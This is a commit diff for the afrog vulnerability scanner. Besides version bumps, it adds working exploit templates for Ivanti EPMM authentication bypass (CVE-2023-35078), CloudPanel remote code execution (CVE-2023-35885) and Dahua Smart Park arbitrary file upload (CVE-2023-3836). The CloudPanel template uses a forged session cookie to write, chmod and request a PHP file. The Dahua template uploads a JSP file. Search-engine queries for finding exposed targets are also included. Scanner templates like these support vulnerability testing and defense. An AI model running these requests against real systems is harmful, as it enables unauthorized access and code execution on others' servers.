update

cmd/afrog/main.go

@@ -19,10 +19,6 @@ import (
 
 func main() {
 
-	// go func() {
-	// 	log.Println(http.ListenAndServe("localhost:6060", nil))
-	// }()
-
 	options, err := config.NewOptions()
 	if err != nil {
 		gologger.Error().Msg(err.Error())

pkg/config/banner.go

@@ -8,7 +8,7 @@ import (
 	"github.com/zan8in/gologger"
 )
 
-const Version = "2.7.5"
+const Version = "2.7.6"
 
 func InitBanner() {
 	fmt.Printf("\r\n|\tA F 🐸 O G\t|")

pocs/afrog-pocs/CVE/2023/CVE-2023-35078.yaml

@@ -0,0 +1,36 @@
+id: CVE-2023-35078
+
+info:
+  name: Ivanti Endpoint Manager Mobile (EPMM) - Authentication Bypass
+  author: parth,pdresearch
+  severity: critical
+  description: |
+    Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, through 11.10 allows remote attackers to obtain PII, add an administrative account, and change the configuration because of an authentication bypass, as exploited in the wild in July 2023. A patch is available.
+    FOFA: mifs
+  affected: |
+    Ivanti Endpoint Manager Mobile 11.10
+    Ivanti Endpoint Manager Mobile 11.9
+    Ivanti Endpoint Manager Mobile 11.8
+    不受支持的旧版本也会受到影响
+  reference:
+    - https://github.com/vchan-in/CVE-2023-35078-Exploit-POC
+    - https://mp.weixin.qq.com/s/cOrhYBSBvwiCDyX2h3hlww
+    - https://forums.ivanti.com/s/article/CVE-2023-35078-Remote-unauthenticated-API-access-vulnerability
+    - https://forums.ivanti.com/s/article/KB-Remote-unauthenticated-API-access-vulnerability-CVE-2023-35078
+    - https://www.cisa.gov/news-events/alerts/2023/07/24/ivanti-releases-security-updates-endpoint-manager-mobile-epmm-cve-2023-35078
+    - https://www.ivanti.com/blog/cve-2023-35078-new-ivanti-epmm-vulnerability
+    - https://help.ivanti.com/mi/help/en_us/CORE/11.2.0.0/dmgw/DMGfiles/Join_Azure_and_MobileIro.htm
+  tags: cve,cve2023,kev,ivanti,mobileiron,epmm
+  created: 2023/07/30
+
+rules:
+  r0:
+    request:
+      method: GET
+      path: /mifs/aad/api/v2/admins/users
+    expression: |
+      response.status == 200 &&
+      response.body.bcontains(b'results') &&
+      response.body.bcontains(b'userId') &&
+      response.body.bcontains(b'name')
+expression: r0()

pocs/afrog-pocs/CVE/2023/CVE-2023-35885.yaml

@@ -0,0 +1,64 @@
+id: CVE-2023-35885
+
+info:
+  name: Cloudpanel 2 < 2.3.1 - Remote Code Execution
+  author: DhiyaneshDk
+  severity: critical
+  description: |
+    CloudPanel 2 before 2.3.1 has insecure file-manager cookie authentication.
+    SHODAN: title:"Cloudpanel"
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-35885
+    - https://www.datack.my/fallingskies-cloudpanel-0-day/
+    - https://github.com/datackmy/FallingSkies-CVE-2023-35885
+    - https://www.cloudpanel.io/docs/v2/changelog/
+  tags: cve,cve2023,cloudpanel,kev,rce,instrusive
+  created: 2023/07/30
+
+set:
+  session: "ZGVmNTAyMDA3ZDI0OGNjZmU0NTVkMGQ2NmJhMjUxYjdhYzg0NzcyYzBmNjM0ODg0ODY0OWYyZTQ0MjgwZDVjZDBjNmY3MWJiZWU4ZTM4OTU4ZmE4YjViNjE4MGJiZjQ4NzA3MzcwNTJiNzFhM2JjYTBmNTdiODQ4ZDZjYjhiNmY1N2U3YTM1YWY3YjA3MTM1ZTlkYjViMjY5OTkzM2Q3NTAyOWI0ZGQ5ZDZmOTFhYTVlZTRhZjg0ZTBmZTU5NjY4NGI4OGU0NjVkNDU4MWYxOTc2MGNiMGI0ZGY2MmZjM2RkMmI4N2RhMzJkYTU4NjNjMWFmMGZlOWIwZjcyZGRkNmFhYzk3ZGVlZmY="
+  str1: randomLowercase(10)
+  str2: randomLowercase(8)
+  hostname: request.url.host
+rules:
+  r0:
+    request:
+      method: GET
+      path: /file-manager/
+      headers:
+        Cookie: clp-fm={{session}}
+    expression: true
+  r1:
+    request:
+      method: POST
+      path: /file-manager/backend/makefile
+      headers:
+        Cookie: clp-fm={{session}}
+      body: |
+        id=/htdocs/app/files/public/&name={{str1}}.php
+    expression: true
+  r2:
+    request:
+      method: POST
+      path: /file-manager/backend/text
+      headers:
+        Cookie: clp-fm={{session}}
+      body: |
+        id=/htdocs/app/files/public/{{str1}}.php&content=<?php echo "{{str2}}"; ?>
+    expression: true
+  r3:
+    request:
+      method: POST
+      path: /file-manager/backend/permissions
+      headers:
+        Cookie: clp-fm={{session}}
+      body: |
+        id=/htdocs/app/files/public/{{str1}}.php&permissions=0777
+    expression: true
+  r4:
+    request:
+      raw: |
+        GET /{{str1}}.php HTTP/2
+        Host: {{hostname}}
+    expression: response.status == 200 && response.body.bcontains(bytes(str2))
+expression: r0() && r1() && r2() && r3() && r4()

pocs/afrog-pocs/CVE/2023/CVE-2023-3836.yaml

@@ -0,0 +1,49 @@
+id: CVE-2023-3836
+
+info:
+  name: Dahua Smart Park Management - Arbitrary File Upload
+  author: HuTa0
+  severity: high
+  verified: true
+  description: |
+    Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.
+    HUNTER: web.body="/WPMS/asset/lib/gridster/"
+    FOFA: body="/WPMS/asset/lib/gridster/"
+  reference:
+    - https://mp.weixin.qq.com/s/bDOXB1kzaaRouxOcU5CJnA
+    - https://github.com/qiuhuihk/cve/blob/main/upload.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-3836
+  tags: cve,cve2023,dahua,fileupload,intrusive,rce
+  created: 2023/06/14
+
+set:
+  randstr: randomLowercase(20)
+  randbody: randomLowercase(32)
+  rboundary: randomLowercase(8)
+rules:
+  r0:
+    request: 
+      method: POST
+      path: /emap/devicePoint_addImgIco?hasSubsystem=true
+      headers:
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
+      body: "\
+          ------WebKitFormBoundary{{rboundary}}\r\n\
+          Content-Disposition: form-data; name=\"upload\";filename=\"{{randstr}}.jsp\"\r\n\
+          Content-Type: application/octet-stream\r\n\
+          Content-Transfer-Encoding: binary\r\n\
+          \r\n\
+          {{randbody}}\r\n\
+          ------WebKitFormBoundary{{rboundary}}--\r\n\
+        "
+    expression: response.status == 200 && response.body.bcontains(b'"code":') && response.body.bcontains(b'"data":')
+    output:
+      search: '"\"code\":1,\"data\":\"(?P<filename>.*?)\"".bsubmatch(response.body)'
+      filename: search["filename"]
+  r1:
+    request:
+      method: GET
+      path: /upload/emap/society_new/{{filename}}
+      follow_redirects: true
+    expression: response.status == 200 && response.body.bcontains(bytes(randbody))
+expression: r0() && r1()

pocs/afrog-pocs/fingerprinting/panel-detect.yaml

@@ -58,6 +58,7 @@ rules:
            - '"openfire-panel" != "" && response.status == 200 && response.body.ibcontains(b"<title>Openfire")'
            - '"basic-auth-detect" != "" && response.status == 401 && response.raw_header.ibcontains(b"Www-Authenticate:")'
            - '"realor-detect" != "" && response.status == 200 && response.body.ibcontains(b"Realor Co.Ltd") && response.body.ibcontains(b"realoronline.gif")'
+           - '"mobileiron-system-manager-detect" != "" && response.status == 200 && response.body.ibcontains(b"<title>MobileIron System Manager: Sign In</title>")'
 
     r1:
         request:
@@ -111,5 +112,6 @@ rules:
            - '"openfire-panel" != "" && response.status == 200 && response.body.ibcontains(b"<title>Openfire")'
            - '"sangfor-ssl-vpn-detect" != "" && response.status == 200 && response.body.ibcontains(b"login_psw.csp")'
            - '"realor-detect" != "" && response.status == 200 && response.body.ibcontains(b"Realor Co.Ltd") && response.body.ibcontains(b"realoronline.gif")'
+           - '"mobileiron-system-manager-detect" != "" && response.status == 200 && response.body.ibcontains(b"<title>MobileIron System Manager: Sign In</title>")'
 
 expression: r0() || r1()

pocs/temp/afrog-pocs/version

@@ -1 +1 @@
-0.2.33
+0.2.35

pocs/v/afrog.version

@@ -1 +1 @@
-2.7.5
+2.7.6

pocs/v/version

@@ -1 +1 @@
-0.2.33
+0.2.35